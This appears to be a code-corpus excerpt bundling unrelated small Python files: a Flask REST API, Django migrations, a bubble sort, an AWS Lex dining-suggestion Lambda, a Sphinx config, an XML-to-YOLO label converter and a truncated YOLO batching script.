| 2022-12-12T20:52:41.191398
| 2020-09-07T15:14:00
| 2020-09-07T15:14:00
| 292,005,598
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,257
|
py
|
import os
from flask import Flask,request
from flask_restful import Api  # An API is a set of routines, protocols, and tools for building software applications.
# Basically, an API specifies how software components should interact
from flask_jwt import JWT #security purpose 1
from resources.item import Item,ItemList
from security import authenticate,identity #inheriting
from resources.user import UserRegister
from resources.store import Store,StoreList
app=Flask(__name__)#"creating" a flask app
app.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get("DATABASE_URL","sqlite:///data.db")#2#where to find "data.db" file
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"]=False#SQLAlchemy has its own track modification
app.secret_key = "jose"#security purpose 2
api = Api(app)#a set of functions and procedures "allowing" the creation of applications,creating Api app
jwt = JWT(app,authenticate,identity)#/auth
api.add_resource(Store,"/store/<string:name>")
api.add_resource(Item,"/item/<string:name>")
api.add_resource(StoreList,"/stores")
api.add_resource(ItemList,"/items")
api.add_resource(UserRegister,"/register")
if __name__ == "__main__": #only the file we run is the main
from db import db
db.init_app(app)
app.run(port=5000,debug=True)
|
[
"nischalhp98@gmail.com"
] |
nischalhp98@gmail.com
|
7a6558293f2b26ecc4cad8e89e91cbb1ffb1a202
|
c028e15a5287ad9ca5cf58ccacccaaa9c32f40a4
|
/apps/ex08query_explorer/migrations/0001_initial.py
|
c2fc147748f476bb8079f055679d77dfb272a6be
|
[] |
no_license
|
huyx/django-exercise
|
0f6363c7ae7b0bb5409fa673118e50db221cb9be
|
6d81c8a5c94ee0820dfc56f817be3144c9636c30
|
refs/heads/master
| 2021-07-09T11:15:00.819385
| 2017-10-04T12:33:41
| 2017-10-04T12:33:41
| 105,282,358
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 791
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-04 03:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Query',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=160, verbose_name='标题')),
('description', models.TextField(blank=True, null=True, verbose_name='描述')),
('query', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"ycyuxin@qq.com"
] |
ycyuxin@qq.com
|
2b12e572e60b666f33fddfbc79c028ad4366a179
|
9c33da70a0197addfa7fc53786a64ad0eaa06cbb
|
/bubbleSort.py
|
f33e617519563e098bf003936265825e18b844a5
|
[] |
no_license
|
manuellara/dataStructuresPython
|
03e8e554055605dbf47532f4e2085f3ac9e69528
|
f59014b90e2c9260e5bd3ebeefb3780ee54d1df3
|
refs/heads/master
| 2020-03-27T01:57:49.908183
| 2018-08-22T20:26:59
| 2018-08-22T20:26:59
| 145,757,070
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
#Bubble Sort
#Runtime :: O( n^2 )
#Space Complexity :: O( 1 )
#good for small lists
def bubbleSort( list ):
for i in range( 0 , len( list )-1 ):
for j in range( 0 , len( list ) - 1 - i ):
if list[ j ] > list[ j+1 ]:
list[ j ] , list[ j+1 ] = list[ j+1 ] , list[ j ]
return list
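# A minimal usage sketch (not part of the original file), assuming the function above:
if __name__ == "__main__":
    sample = [5, 1, 4, 2, 8]
    print(bubbleSort(sample))  # expected output: [1, 2, 4, 5, 8]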
|
[
"manuellaraa@gmail.com"
] |
manuellaraa@gmail.com
|
c064a3df67c9e1823f33effe6f863832443c9cf3
|
7f8660729c81b3401147d813ec30fc86e2642c30
|
/python/funkcjee.py
|
fbac1675e083cbae3132c34d3d5d1b20141d4c4c
|
[] |
no_license
|
Patrycja13/gitrepo
|
881e0451933919ef007bf649ea41af3014edb254
|
ea9f9fdce484c477b26cbb25f28261747657261a
|
refs/heads/master
| 2021-07-10T00:01:41.796938
| 2019-03-25T08:29:54
| 2019-03-25T08:29:54
| 103,923,098
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 902
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# funkcjee.py
#
#
import random
def wypelnij(lista, ile, maks):
for i in range(ile):
lista.append(random.randint(0, maks))
return lista
def drukuj(lista):
licznik = 0
for liczba in lista:
if not liczba % 2:
licznik += 1
print("Liczb parzystych ", licznik)
def suma_nieparzyste(lista):
    """ Sums all the odd numbers from the given list and prints that sum """
    suma = 0
    for liczba in lista:
        if liczba % 2:
            suma += liczba
    print("Sum of odd numbers ", suma)
def main(args):
lista = []
ile = 75
maks = 100
wypelnij(lista, ile, maks)
print(lista )
drukuj(lista)
suma_nieparzyste(lista)
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
|
[
"patrycja.gawel13@onet.pl"
] |
patrycja.gawel13@onet.pl
|
2baeb00b87da6023b8316c4f129c32db3694b122
|
397dd04f8c7b55575c7c147261957adfa45b0fa9
|
/LF/LF1.py
|
2776a33b6d88c21518bd0ea15dbae50e2a65b3bb
|
[] |
no_license
|
ArminJZ/Dining-Suggestion-Chatbot
|
6556c0f052f2241a5d18afdbe1a8694bc3bf08bb
|
7616e959a78c58bbf1d8b7c92ea5f7148f9629f0
|
refs/heads/master
| 2021-03-30T08:57:13.187622
| 2020-03-17T17:42:59
| 2020-03-17T17:42:59
| 248,034,810
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,935
|
py
|
from botocore.vendored import requests
import json
import os
import time
import dateutil.parser
import logging
import datetime
import urllib
import sys
import boto3
try:
# For Python 3.0 and later
from urllib.error import HTTPError
from urllib.parse import quote
from urllib.parse import urlencode
except ImportError:
# Fall back to Python 2's urllib2 and urllib
from urllib2 import HTTPError
from urllib import quote
from urllib import urlencode
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
def isvalid_city(city):
valid_cities = ['new york', 'manhattan', 'brooklyn', ]
return city.lower() in valid_cities
def isvalid_date(date):
try:
dateutil.parser.parse(date)
return True
except ValueError:
return False
def isvalid_cuisine_type(cuisine_type):
cuisines = ["indian", "italian", "mediterranean", "french", "japanese", "chinese", "spanish", "american", "mexican"]
return cuisine_type.lower() in cuisines
def build_validation_result(isvalid, violated_slot, message_content):
return {
'isValid': isvalid,
'violatedSlot': violated_slot,
'message': {'contentType': 'PlainText', 'content': message_content}
}
def validate_suggest_place(slots):
v_city = slots['Location']
v_date = slots['Date']
v_time = slots['Time']
v_peoplecount = safe_int(slots['NumberOfPeople'])
v_cuisine_type = slots['Cuisine']
if v_city and not isvalid_city(v_city):
return build_validation_result(
False,
'Location',
'We currently do not support {} as a valid destination. Can you try a different city?'.format(v_city)
)
if v_date:
if not isvalid_date(v_date):
return build_validation_result(False, 'Date',
                                           'I did not understand the date you provided. Can you please tell me what date you are planning to go?')
if datetime.datetime.strptime(v_date, '%Y-%m-%d').date() < datetime.date.today():
return build_validation_result(False, 'Date',
'Suggestions cannot be made for date earlier than today. Can you try a different date?')
if v_peoplecount is not None:
num_people = int(v_peoplecount)
if num_people > 20 or num_people < 0:
return build_validation_result(False,
'NumberOfPeople',
                                           'Please enter a number of people between 0 and 20')
if v_cuisine_type and not isvalid_cuisine_type(v_cuisine_type):
return build_validation_result(
False,
'Cuisine',
'I did not recognize that cuisine. What cuisine would you like to try? '
'Popular cuisines are Japanese, Indian, or Italian')
return {'isValid': True}
def close(session_attributes, fulfillment_state, message):
response = {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'Close',
'fulfillmentState': fulfillment_state,
'message': {'contentType': 'PlainText', 'content': message}
}
}
return response
def elicit_slot(session_attributes, intent_name, slots, slot_to_elicit, message):
return {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'ElicitSlot',
'intentName': intent_name,
'slots': slots,
'slotToElicit': slot_to_elicit,
'message': message
}
}
def delegate(session_attributes, slots):
return {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'Delegate',
'slots': slots
}
}
def safe_int(n):
if n is not None:
return int(n)
return n
def diningSuggestions(intent_request):
location = intent_request['currentIntent']['slots']['Location']
cuisine = intent_request['currentIntent']['slots']['Cuisine']
peopleNum = intent_request['currentIntent']['slots']['NumberOfPeople']
date = intent_request['currentIntent']['slots']['Date']
time_open = intent_request['currentIntent']['slots']['Time']
phone = str(intent_request['currentIntent']['slots']['Phone'])
# cuisine = "chinese"
# phone_num = "+16263285824"
# location = "brooklyn"
# date = "2019-10-17"
# dining_time = "13:00"
# peopleNum = "2"
if phone[:2] != '+1':
phone = '+1' + phone
session_attributes = intent_request['sessionAttributes'] if intent_request['sessionAttributes'] is not None else {}
if intent_request['invocationSource'] == 'DialogCodeHook':
validation_result = validate_suggest_place(intent_request['currentIntent']['slots'])
if not validation_result['isValid']:
intent_request['currentIntent']['slots'][validation_result['violatedSlot']] = None
# print(validation_result['message'])
return elicit_slot(
session_attributes,
intent_request['currentIntent']['name'],
intent_request['currentIntent']['slots'],
validation_result['violatedSlot'],
validation_result['message']
)
return delegate(session_attributes, intent_request['currentIntent']['slots'])
sqsmessage = cuisine + ' ' + str(phone)
# SQS service
sqs = boto3.client('sqs')
queue_url = 'https://sqs.us-east-1.amazonaws.com/584092006642/LF1-to-LF2'
response = sqs.send_message(
QueueUrl=queue_url,
MessageAttributes={
'cuisine': {
'DataType': 'String',
'StringValue': cuisine
},
'phone': {
'DataType': 'String',
'StringValue': phone
},
'location': {
'DataType': 'String',
'StringValue': location
},
'peoplenum': {
'DataType': 'String',
'StringValue': peopleNum
},
'date': {
'DataType': 'String',
'StringValue': date
},
'time': {
'DataType': 'String',
'StringValue': time_open
}
},
MessageBody=(
sqsmessage
)
)
logger.debug(sqsmessage)
return close(
session_attributes,
'Fulfilled',
'I have sent my suggestions to the following phone number: \n' + phone
)
def greeting(intent_request):
response = {
'dialogAction': {
"type": "ElicitIntent",
'message': {
'contentType': 'PlainText',
'content': 'Yo, how can I help?'}
}
}
return response
def thankyou(intent_request):
response = {
'dialogAction': {
"type": "ElicitIntent",
'message': {
'contentType': 'PlainText',
'content': 'You\'re welcome!'}
}
}
return response
def dispatch(intent_request):
logger.debug(
'dispatch userId={}, intentName={}'.format(intent_request['userId'], intent_request['currentIntent']['name']))
intent_name = intent_request['currentIntent']['name']
# Dispatch to your bot's intent handlers
if intent_name == 'GreetingIntent':
return greeting(intent_request)
elif intent_name == 'ThankYouIntent':
return thankyou(intent_request)
elif intent_name == 'DiningSuggestionsIntent':
return diningSuggestions(intent_request)
raise Exception('Intent with name ' + intent_name + ' not supported')
def lambda_handler(event, context):
os.environ['TZ'] = 'America/New_York'
time.tzset()
logger.debug('event.bot.name={}'.format(event['bot']['name']))
return dispatch(event)
|
[
"woodenrubberzhang@gmail.com"
] |
woodenrubberzhang@gmail.com
|
38e66487b8f3e6080d36fa5c19b8a95bc793311f
|
0e9f73d2ef1239b22e049ef6338362da7dbfb122
|
/source/web/Django/FatQuantsDjango/FatQuantsDjango/ticker/migrations/0065_auto_20190209_2232.py
|
da99dbc20030cad9a96f28f1f13228b4442183bd
|
[] |
no_license
|
Andy-Mason/FatQuants
|
3c4bfafc29834af76b0be40e93b0e210e0ef5056
|
edd0e98f4599ef91adbdf4179164769ddd66c62a
|
refs/heads/master
| 2023-01-11T10:57:50.563742
| 2021-08-11T19:04:59
| 2021-08-11T19:04:59
| 73,127,295
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 661
|
py
|
# Generated by Django 2.1.3 on 2019-02-09 22:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ticker', '0064_auto_20190209_2231'),
]
operations = [
migrations.AddField(
model_name='tickereoddata',
name='close_value',
field=models.FloatField(blank=True, db_column='close_value', null=True, verbose_name='Close'),
),
migrations.AddField(
model_name='tickereoddata',
name='volume',
field=models.FloatField(blank=True, db_column='volume', null=True, verbose_name='Volume'),
),
]
|
[
"Andy-Mason@users.noreply.github.com"
] |
Andy-Mason@users.noreply.github.com
|
1f51647eba384115a71102ac36198438a8261671
|
55b78bafd8a396907ec669236206d1ea74a36610
|
/manage.py
|
b44e526b9dca86c886ab3a6c199470a05d761f59
|
[] |
no_license
|
LorroWijn/eHealth
|
8dd6d171e6c4ab085c3d372f3ef404577de66afb
|
b963a3b92d774ca1e8cd63d7ec3736d4579ebbac
|
refs/heads/master
| 2023-02-11T01:54:46.658539
| 2021-01-12T10:46:09
| 2021-01-12T10:46:09
| 301,711,008
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 663
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'eHealth.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"33690232+LorroWijn@users.noreply.github.com"
] |
33690232+LorroWijn@users.noreply.github.com
|
9b065ad3bc64f06b7fcaff92d27fb2ee90ecfe6e
|
fc58366ed416de97380df7040453c9990deb7faa
|
/tools/dockerize/webportal/usr/lib/python2.7/site-packages/oslo_db/tests/old_import_api/utils.py
|
44eb1aeb24eb802ae554e3fcfda13866332912a7
|
[
"Apache-2.0"
] |
permissive
|
foruy/openflow-multiopenstack
|
eb51e37b2892074234ebdd5b501b24aa1f72fb86
|
74140b041ac25ed83898ff3998e8dcbed35572bb
|
refs/heads/master
| 2016-09-13T08:24:09.713883
| 2016-05-19T01:16:58
| 2016-05-19T01:16:58
| 58,977,485
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,310
|
py
|
# Copyright 2010-2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
from oslo.config import cfg
from oslotest import base as test_base
from oslotest import moxstubout
import six
if six.PY3:
@contextlib.contextmanager
def nested(*contexts):
with contextlib.ExitStack() as stack:
yield [stack.enter_context(c) for c in contexts]
else:
nested = contextlib.nested
class BaseTestCase(test_base.BaseTestCase):
def setUp(self, conf=cfg.CONF):
super(BaseTestCase, self).setUp()
moxfixture = self.useFixture(moxstubout.MoxStubout())
self.mox = moxfixture.mox
self.stubs = moxfixture.stubs
self.conf = conf
self.addCleanup(self.conf.reset)
|
[
"wenxiang.wang1204@gmail.com"
] |
wenxiang.wang1204@gmail.com
|
3da690d33b022de40070de3907852084abdc8e90
|
6badd56b2360979c1c4a22cfe719de9c6d5d56d7
|
/Flask/migrations/versions/8aaa54384776_.py
|
27e8343759c655f46575b7f6ad673423ef8c60f8
|
[] |
no_license
|
ferrufino/t247
|
e78afff820816a2db39fbba95d2da94ce635e4ef
|
6247983295c448c987bef5eff40be99c61e43bcf
|
refs/heads/master
| 2021-09-03T15:15:23.945909
| 2016-12-26T23:06:37
| 2016-12-26T23:06:37
| 23,481,514
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
"""empty message
Revision ID: 8aaa54384776
Revises: 839b2982db1f
Create Date: 2016-11-29 18:06:51.782267
"""
# revision identifiers, used by Alembic.
revision = '8aaa54384776'
down_revision = '839b2982db1f'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('submission', sa.Column('no_of_attempt', sa.Integer(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('submission', 'no_of_attempt')
### end Alembic commands ###
|
[
"msf1013@gmail.com"
] |
msf1013@gmail.com
|
503cdbd13ac9e95d89d2847aabb527de1c810769
|
369b7f114f9bd9b45dd5fef77a070cb73abb68d1
|
/handle/itl/h20180123/insertFundInvestLog.py
|
0754801c39b9a7088aaa3f77d47ee88123974bf7
|
[] |
no_license
|
lyjloveabc/thor_handle
|
d790ee25317f724825c94a6b346a034ec0ae6e3d
|
8b9eda97ec873f3bf1732a428898a04d6a55c0af
|
refs/heads/master
| 2021-12-27T10:15:16.668264
| 2021-08-16T13:45:34
| 2021-08-16T13:45:34
| 84,824,162
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 571
|
py
|
import json
import requests
class InsertFundInvestLog:
def __init__(self):
# self.ENV = 'http://127.0.0.1:7001'
self.ENV = 'http://127.0.0.1:7001'
self.ENV_PROD = 'http://121.43.166.200:7001'
def handle(self):
with open('fundInvestLog_20180301.json', 'r') as f:
data = json.load(f)
for row in data:
response = requests.post(self.ENV_PROD + '/fundInvestLog/fundInvestLog', data=row)
print(response.text)
if __name__ == '__main__':
ifil = InsertFundInvestLog()
ifil.handle()
|
[
"546223592@qq.com"
] |
546223592@qq.com
|
f44c79dba52af15a4c324b94646a2e32d5a6143e
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-gsn-edf/gsn-edf_ut=2.5_rd=0.65_rw=0.04_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=90/sched.py
|
73271d93d6d30c676753279395b2f3b6ba2f57c3
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794
| 2021-04-25T03:27:16
| 2021-04-25T03:27:16
| 358,926,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 259
|
py
|
-X FMLP -Q 0 -L 3 93 400
-X FMLP -Q 0 -L 3 80 400
-X FMLP -Q 1 -L 2 79 250
-X FMLP -Q 1 -L 2 57 175
-X FMLP -Q 2 -L 1 54 200
-X FMLP -Q 2 -L 1 39 400
-X FMLP -Q 3 -L 1 37 125
-X FMLP -Q 3 -L 1 33 200
29 150
18 150
16 150
11 125
11 125
|
[
"ricardo.btxr@gmail.com"
] |
ricardo.btxr@gmail.com
|
ecfcb71ce402310d3b32ca4dcfac0fb352addc47
|
d5c8ca88c643492b95ca57e972b76bcc56aac251
|
/tests/fr.py
|
04c4b5cd0876d96bfc25cd944cadcaa63294945c
|
[
"MIT"
] |
permissive
|
olopost/l18n
|
b8462e6cd5eed0293e9e18cde23c850bc8553514
|
c6ef71a94f32537d5c072b493b94d35ee06d9bf4
|
refs/heads/master
| 2020-03-19T16:14:17.737843
| 2018-06-09T09:12:34
| 2018-06-09T09:12:34
| 136,706,924
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 648
|
py
|
# -*- coding: utf-8 -*-
import l18n
from ._base import TestCase
from ._compat import unicode
class FrTests(TestCase):
language = 'fr'
def test_tz_city_translated(self):
self.assertEqual(
unicode(l18n.tz_cities['America/North_Dakota/New_Salem']),
u'New Salem (Dakota du Nord)'
)
def test_tz_fullname_translated(self):
self.assertEqual(
unicode(l18n.tz_fullnames['America/North_Dakota/New_Salem']),
u'Amérique/Dakota du Nord/New Salem'
)
def test_territory_translated(self):
self.assertEqual(unicode(l18n.territories['ES']), u'Espagne')
|
[
"samuel@meyn.fr"
] |
samuel@meyn.fr
|
c81a79a1e9e75fd4a88e801d5f26317e03ca49a3
|
e9c293194c317f4b4771074291e50a3f6545b279
|
/xmltxt.py
|
c8df80cec34f6cc7a927b9f3c09936d6a6fe325a
|
[] |
no_license
|
XLSAAA/yolov5
|
5928a3b1c2b08d1a56d6de8f0720d17dfee5b42f
|
ad6a745341167e1d96c79d86eb5557b5ae6e352e
|
refs/heads/main
| 2023-07-07T22:40:37.477448
| 2021-09-05T03:17:07
| 2021-09-05T03:17:07
| 403,201,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,371
|
py
|
import os
import xml.etree.ElementTree as ET
dirpath = 'F:/yhzkpoj/yolov5-master/imagetxt'  # directory that originally holds the xml files
newdir = 'F:/yhzkpoj/yolov5-master/fenglangjuxu'  # directory for the txt files produced after relabelling
if not os.path.exists(newdir):
os.makedirs(newdir)
for fp in os.listdir(dirpath):
root = ET.parse(os.path.join(dirpath, fp)).getroot()
xmin, ymin, xmax, ymax = 0, 0, 0, 0
sz = root.find('size')
width = float(sz[0].text)
height = float(sz[1].text)
filename = root.find('filename').text
    for child in root.findall('object'):  # find all bounding boxes in the image
        sub = child.find('bndbox')  # locate the box annotation and read its values
xmin = float(sub[0].text)
ymin = float(sub[1].text)
xmax = float(sub[2].text)
ymax = float(sub[3].text)
        try:  # convert to the yolov3 label format; values must be normalized to the (0-1) range
x_center = (xmin + xmax) / (2 * width)
y_center = (ymin + ymax) / (2 * height)
w = (xmax - xmin) / width
h = (ymax - ymin) / height
except ZeroDivisionError:
            print(filename, ' has an invalid width')
with open(os.path.join(newdir, fp.split('.')[0] + '.txt'), 'a+') as f:
f.write(' '.join([str(2), str(x_center), str(y_center), str(w), str(h) + '\n']))
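# Worked example of the normalization above (illustrative numbers, not taken from any real annotation):
# a box (xmin=100, ymin=50, xmax=300, ymax=250) in a 640x480 image becomes
#   x_center = (100 + 300) / (2 * 640) = 0.3125
#   y_center = (50 + 250) / (2 * 480) = 0.3125
#   w = (300 - 100) / 640 = 0.3125
#   h = (250 - 50) / 480 ≈ 0.4167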
|
[
"noreply@github.com"
] |
noreply@github.com
|
2e512f27daf59d99f6040b185763a00b8e07ea3a
|
8a84375dac5e6b33215d20e12e0c197aeaa6e83d
|
/docs/conf.py
|
9ff817f5b2af6580eaed06b752ba69a80d83d411
|
[
"Apache-2.0"
] |
permissive
|
michaeljoseph/pymoji
|
5579af089cabf1784c656e7fddf9d20f9e6f5d6a
|
4bf26babc7b968d9a753907d4db5402cfd5c6d63
|
refs/heads/master
| 2021-01-01T18:12:37.805141
| 2013-12-09T10:42:24
| 2013-12-09T10:42:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,403
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# complexity documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
import sphinx_bootstrap_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import pymoji
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pymoji'
copyright = u', '
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = pymoji.__version__
# The full version, including alpha/beta/rc tags.
release = pymoji.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pymojidoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'pymoji.tex', u'pymoji Documentation',
u'', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pymoji', u'pymoji Documentation',
[u''], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pymoji', u'pymoji Documentation',
u'', 'pymoji', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
html_theme = 'bootstrap'
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
|
[
"michaeljoseph+github@gmail.com"
] |
michaeljoseph+github@gmail.com
|
92a00f87e97ffb33bc7cf6bcb4ca4102f87306bb
|
0d05a57a20f482c1435a6945a908cf28efbf15ba
|
/perceptrons/classical/tinyYolo/pyjawns/dailybatcher_1.py
|
a84adee72ed0587e901cdc57af714621d85b26e6
|
[] |
no_license
|
vinceparis95/zoo
|
67950d35585111bcd3f377f93f4de7b09dc45bb4
|
12d44327fc8bec5da2f5ea286dfeb24a5183194c
|
refs/heads/master
| 2020-09-10T22:03:39.231942
| 2019-11-21T02:05:54
| 2019-11-21T02:05:54
| 221,846,140
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,796
|
py
|
import pandas as pd
import numpy as np
import datetime
import glob
import re
'''
this program takes a daily batch of classifications for an environment,
and creates a matrix, containing 'id', 'age', and 'feature sum' columns.
These matrices are sent to output folders, one for each environment.
'''
# create 'file' column from yolo json
dataFrame = []
for image in glob.iglob('/Users/vinceparis/dev/dfyb/GrowLogs/ei/_images/out/*.json'):
file = re.findall(r'\d+', image)
dataFrame.append(file)
fileColumn = np.c_[dataFrame]
dataFrame = pd.DataFrame(fileColumn)
# create feature column from the sum of features
dataFrameB = pd.DataFrame()
dataFrameC = pd.DataFrame()
for image in glob.iglob('/Users/vinceparis/dev/dfyb/GrowLogs/ei/_images/out/*.json'):
df = pd.read_json(image)
dfFiltered = df.filter(items=['label', '0'])
